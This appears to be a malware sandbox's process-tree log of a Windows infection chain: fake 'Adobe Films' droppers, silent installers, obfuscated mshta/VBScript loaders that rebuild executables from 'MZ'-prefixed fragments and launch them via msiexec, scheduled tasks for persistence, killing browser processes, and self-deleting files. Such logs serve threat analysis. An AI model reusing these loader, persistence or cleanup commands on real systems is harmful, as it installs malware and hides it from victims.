C:\Users\Admin\AppData\Local\Temp\is-0IUTA.tmp\yJvvpFMTC2oHk_J4a2l2BZEX.tmp"C:\Users\Admin\AppData\Local\Temp\is-0IUTA.tmp\yJvvpFMTC2oHk_J4a2l2BZEX.tmp" /SL5="$303D0,506127,422400,C:\Users\Admin\Pictures\Adobe Films\yJvvpFMTC2oHk_J4a2l2BZEX.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\is-Q6GRU.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-Q6GRU.tmp\DYbALA.exe" /S /UID=27104⤵
-
C:\Program Files\Common Files\VBNQPMRAFB\foldershare.exe"C:\Program Files\Common Files\VBNQPMRAFB\foldershare.exe" /VERYSILENT5⤵
-
C:\Users\Admin\AppData\Local\Temp\ed-5fe95-af4-86cb4-694795ab04647\Jotitojyzhae.exe"C:\Users\Admin\AppData\Local\Temp\ed-5fe95-af4-86cb4-694795ab04647\Jotitojyzhae.exe"5⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\a8-5b8b6-6a2-89cb2-d325863432396\Kalelaqoku.exe"C:\Users\Admin\AppData\Local\Temp\a8-5b8b6-6a2-89cb2-d325863432396\Kalelaqoku.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\x3oi3eek.nyj\GcleanerEU.exe /eufive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\x3oi3eek.nyj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\x3oi3eek.nyj\GcleanerEU.exe /eufive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exe /qn CAMPAIGN="654" & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exeC:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exe /qn CAMPAIGN="654"7⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\nbcvu4jz.o4w\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1635082403 /qn CAMPAIGN=""654"" " CAMPAIGN="654"8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exeC:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe"C:\Users\Admin\AppData\Local\Temp\aytwpv54.3qv\any.exe" -u8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jaq4eo4w.xdp\gcleaner.exe /mixfive & exit6⤵
-
C:\Users\Admin\AppData\Local\Temp\jaq4eo4w.xdp\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\jaq4eo4w.xdp\gcleaner.exe /mixfive7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2tvqfczm.q0d\autosubplayer.exe /S & exit6⤵
-
C:\Users\Admin\Pictures\Adobe Films\kFRqN4Hc4UL5STN4QTkWyQbn.exe"C:\Users\Admin\Pictures\Adobe Films\kFRqN4Hc4UL5STN4QTkWyQbn.exe"2⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09977fdc12334.exeWed09977fdc12334.exe1⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\mkUYpAqnTT_Y6NFFnI0BnMAQ.exe"C:\Users\Admin\Pictures\Adobe Films\mkUYpAqnTT_Y6NFFnI0BnMAQ.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\VJLY_KstCN_8p2Gf_Rv0VShA.exe"C:\Users\Admin\Pictures\Adobe Films\VJLY_KstCN_8p2Gf_Rv0VShA.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\ZzEa6lWClVPLFIq3UqymzBXh.exe"C:\Users\Admin\Pictures\Adobe Films\ZzEa6lWClVPLFIq3UqymzBXh.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\I2wZwOb3RRI8z1uO0uqbagJA.exe"C:\Users\Admin\Pictures\Adobe Films\I2wZwOb3RRI8z1uO0uqbagJA.exe"2⤵
-
C:\Users\Admin\Pictures\Adobe Films\FcV14WEg5407DrTsHvKslqZf.exe"C:\Users\Admin\Pictures\Adobe Films\FcV14WEg5407DrTsHvKslqZf.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im FcV14WEg5407DrTsHvKslqZf.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\FcV14WEg5407DrTsHvKslqZf.exe" & del C:\ProgramData\*.dll & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im FcV14WEg5407DrTsHvKslqZf.exe /f4⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\E67re5CdQRiyZeOq0TjTHrFT.exe"C:\Users\Admin\Pictures\Adobe Films\E67re5CdQRiyZeOq0TjTHrFT.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\FwHqtgaeyOSwZ8d9WMwXxCEz.exe"C:\Users\Admin\Pictures\Adobe Films\FwHqtgaeyOSwZ8d9WMwXxCEz.exe"2⤵
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\gkYTnqBZBqUPnzpamoekAIM0.exe"C:\Users\Admin\Documents\gkYTnqBZBqUPnzpamoekAIM0.exe"3⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"C:\Users\Admin\Pictures\Adobe Films\lV9_TEwuM5VN8iP3KY2Rmw3n.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"C:\Users\Admin\Pictures\Adobe Films\TVQZlpNkcFCBtgxDky_8XLsb.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"C:\Users\Admin\Pictures\Adobe Films\UHFLTWpdq9qG2qWSoVixA_pf.exe"4⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe5⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe6⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"C:\Users\Admin\Pictures\Adobe Films\uphVV8ghcsrAKvTLycJGCo_b.exe"4⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"C:\Users\Admin\Pictures\Adobe Films\EWnx129zDeiQSYhyoL3PSDof.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6P5PT.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp"C:\Users\Admin\AppData\Local\Temp\is-6P5PT.tmp\twjpSfW7b7DaWXoO_nabM6tv.tmp" /SL5="$C0280,506127,422400,C:\Users\Admin\Pictures\Adobe Films\twjpSfW7b7DaWXoO_nabM6tv.exe"5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-8EU2N.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-8EU2N.tmp\DYbALA.exe" /S /UID=27096⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Drops file in Program Files directory
-
C:\Program Files\Uninstall Information\GHGLGAOUIE\foldershare.exe"C:\Program Files\Uninstall Information\GHGLGAOUIE\foldershare.exe" /VERYSILENT7⤵
-
C:\Users\Admin\AppData\Local\Temp\c3-a46f7-c05-3c786-c08d40efc309d\Ralyxixaeco.exe"C:\Users\Admin\AppData\Local\Temp\c3-a46f7-c05-3c786-c08d40efc309d\Ralyxixaeco.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\9e-30c38-407-bc28f-32adaa9fe3465\Wysadudaecu.exe"C:\Users\Admin\AppData\Local\Temp\9e-30c38-407-bc28f-32adaa9fe3465\Wysadudaecu.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\y5uceszc.nhe\GcleanerEU.exe /eufive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\y5uceszc.nhe\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\y5uceszc.nhe\GcleanerEU.exe /eufive9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1gnwef2n.j2h\installer.exe /qn CAMPAIGN="654" & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\1gnwef2n.j2h\installer.exeC:\Users\Admin\AppData\Local\Temp\1gnwef2n.j2h\installer.exe /qn CAMPAIGN="654"9⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exeC:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe"C:\Users\Admin\AppData\Local\Temp\tsx1tqo0.ikp\any.exe" -u10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4vwqq4fr.4te\gcleaner.exe /mixfive & exit8⤵
-
C:\Users\Admin\AppData\Local\Temp\4vwqq4fr.4te\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\4vwqq4fr.4te\gcleaner.exe /mixfive9⤵
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global10⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oghbpm0r.bte\autosubplayer.exe /S & exit8⤵
-
C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"4⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If """" == """" for %M in (""C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )5⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""=="" for %M in ("C:\Users\Admin\Pictures\Adobe Films\zB7_0GOQqQ5HH8ie1hSkX10G.exe" ) do taskkill -f -iM "%~NxM"6⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV17⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi7⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ).Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in (""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&&sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi &If "/PLQtzfgO0m8dRv4iYALOqi "=="" for %M in ("C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpt:CLosE ( cReAteobjEcT("wscRiPt.SheLl" ). RUn ("C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE) )8⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~>TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V +1W8lBDVH.AOu +WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC& Del /q *&starT msiexec -Y ..\lXQ2g.WC9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"10⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC10⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "zB7_0GOQqQ5HH8ie1hSkX10G.exe"7⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"C:\Users\Admin\Pictures\Adobe Films\kz0TRXTqgY84jnr15mFDIwO1.exe"4⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=15⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--iUSIg"6⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x194,0x204,0x7ffbcabcdec0,0x7ffbcabcded0,0x7ffbcabcdee07⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=1724 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1648 /prefetch:27⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=2180 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2568 /prefetch:17⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2592 /prefetch:17⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3224 /prefetch:27⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3256 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3632 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3436 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3268 /prefetch:87⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=2632 /prefetch:87⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1612,16638404329082477390,7009038556646890517,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw9140_342681518" --mojo-platform-channel-handle=3580 /prefetch:87⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"4⤵
-
C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe"C:\Users\Admin\Pictures\Adobe Films\Gr7giyafFxvtrxqsfPA4BlU8.exe" -u5⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """"=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))1⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed094c47c32b.exe") do taskkill -f -im "%~nxL"2⤵
-
C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exEXYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF3⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScript: cLOSE( CREatEObJEcT ( "WSCRIpt.ShELL"). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF ""=="""" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe))4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF "=="" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE") do taskkill -f -im "%~nxL"5⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCriPt:closE ( CrEaTeoBJecT ("WsCRiPT.ShEll" ). RuN( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ))4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t+XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou &STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"6⤵
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\PEQQN6S.OU6⤵
- Loads dropped DLL
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -im "Wed094c47c32b.exe"3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-U85DD.tmp\Wed09d27135e5a8b3b.tmp"C:\Users\Admin\AppData\Local\Temp\is-U85DD.tmp\Wed09d27135e5a8b3b.tmp" /SL5="$50056,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS8213C1D5\Wed09d27135e5a8b3b.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
